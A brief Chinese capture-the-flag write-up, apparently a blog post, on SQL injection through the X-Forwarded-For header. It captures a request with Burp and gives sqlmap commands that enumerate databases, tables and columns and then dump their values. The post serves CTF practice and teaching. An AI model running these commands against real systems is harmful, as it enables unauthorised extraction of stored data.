【CTF】X-Forwarded-For SQL注入实战

1.首先burp抓包,分析post包,保存为txt文件

(可看这个 https://blog.csdn.net/u014549283/article/details/81290015 ,此处用 -r 参数)

2、使用sqlmap进行注入

爆数据库

sqlmap -r xxx.txt --dbs --batch

 

爆表名

sqlmap -r xxx.txt -D 数据库名 --table --batch

 

爆表中的字段

sqlmap -r xxx.txt -D 数据库名 -T 表名 --columns --batch

 

爆字段中的值

sqlmap -r xxx.txt -D 数据库名 -T 表名 -C '字段名' --dump --batch

你可能感兴趣的:(CTF,CTF)